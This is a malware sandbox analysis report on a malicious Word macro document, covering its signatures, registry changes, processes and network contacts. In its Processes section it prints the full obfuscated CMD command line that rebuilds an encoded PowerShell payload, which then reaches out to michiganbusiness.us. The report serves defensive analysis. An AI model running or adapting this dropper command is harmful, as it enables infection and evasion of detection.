Analysis Overview
SHA256
c57bc62f944a858d7b6b1e2ff89f50f466b260cf79385517cc9c108d9b244530
Threat Level: Known bad
The file 75b5887bf105e8c270a980a1122802d3_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Office macro that triggers on suspicious action
Suspicious Office macro
Blocklisted process makes network request
An obfuscated cmd.exe command-line is typically used to evade detection.
Drops file in Windows directory
Office loads VBA resources, possible macro or embedded object present
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Modifies registry class
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 14:00
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 14:00
Reported
2024-05-26 14:06
Platform
win7-20240508-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\CMD.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\CMD.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\75b5887bf105e8c270a980a1122802d3_JaffaCakes118.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\CMD.exe
CMD /v^ /R" ^S^E^t ^ ^ ^B^W^k^q==^A^AI^A^ACAg^AAIAAC^A^gAA^I^A^AC^A^g^AA^I^A^ACA^g^A^A^IAAC^Ag^AA^IAACA9^BQf^A^s^H^A^oBw^Y^A^QHAh^B^wY^A0HA^7^Aw^aAEGAlBgcA^IGA^7^A^QVAY^E^A^qB^A^JA^AC^AtB^Q^ZA^Q^HA^J^BQLAU^GArB^w^bAY^HA^u^BQSA^sDApAQVAY^EA^qB^A^JAACA^sA^A^a^A^8E^A3^B^A^JA^gCAlBAbAk^G^AGBAZA^EGAvBAbA4G^A^3^B^w^b^AQEA^uA^g^W^A^Y^E^Ay^BA^JAsHA^5^BgcAQHA7BQKAY^E^A^tB^gUA^QC^A^gAgb^Ak^G^A^g^AA^aA8^E^A^3BA^JA^gCA^oB^wYAEG^AlB^gc^A8G^A^mBw^O^AcCAl^BAe^AUG^Au^A^wJA^sC^A^3^B^wQ^A^kG^A^k^A^w^K^AcCAc^B^wJ^AsC^AjBQ^aAw^G^Ai^BQd^A^A^HA6^Ag^d^A^4^GAl^B^AJA0D^AV^B^gR^A^o^GA^kA^w^O^AcC^Aw^AA^OA^Y^DAn^A^A^IA^0^D^AgAwdA^ME^A^pB^A^JAs^DApAw^J^AAE^AnA^A^K^AQ^HA^p^BAb^A^A^HA^TBgLAcC^A^q^B^Q^OAgG^AQBw^L^A^U^H^AyB^gL^A^kGArBQ^YAI^GA^t^A^w^b^AQ^HA^2B^Q^Y^A^8CAv^AgO^AAH^A^0B^A^d^AgGA^AB^gVA^E^DAwA^w^T^AgEAaBQc^A^MGAv^AQ^b^A^8GAj^B^g^LAE^G^AmBgZ^Ag^G^AnB^Q^aA^g^GAlBAbAkG^At^B^w^L^A^8CA^6^A^Ac^AQHA^0B^Aa^AAE^AxAwcAc^D^AR^BwLA0GAv^BwY^A4CA6^BQd^AwG^A^h^B^AbAUGAk^Bgc^AQ^GAv^A^w^L^AoD^Aw^B^AdA^Q^H^A^o^BAQAgD^AvAQbA^8G^A^jB^gLA^sG^Ap^B^A^bAMHAh^Bwa^AQ^GA^pB^gcAcGA^uB^Q^a^A^8C^AvAgO^A^A^HA0BA^d^A^g^GAAB^gNAUE^AC^Bg^a^A^8CA^zBQ^dA^4C^AzBwc^AUG^Au^BQ^a^AMHA1BgYA4GA^hB^wZA^k^G^AoBwYAk^G^A^tBwL^A^8C^A^6^AAcA^QHA^0BAaAcCA^9^AgRA^0GA^SBAJ^AsD^A0Bg^b^A^UG^A^pBA^b^AM^E^AiBQZ^AcF^AuA^AdAUG^A^O^B^A^IAQH^A^jB^Q^ZAoGA^iBw^bA^0C^A^3^BQ^ZA4G^A9A^g^WAY^EAy^BA^J ^e-^ l^l^eh^srewo^p&& f^oR /^l %^e ^in ( ^921 ^-1^ ^0) ^dO s^e^t C^H=!C^H!!^B^W^k^q:~ %^e,1!&& ^I^F %^e =^=^0 C^a^LL %C^H:^~ ^ ^4% "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e 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
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | michiganbusiness.us | udp |
| US | 103.224.212.213:80 | michiganbusiness.us | tcp |
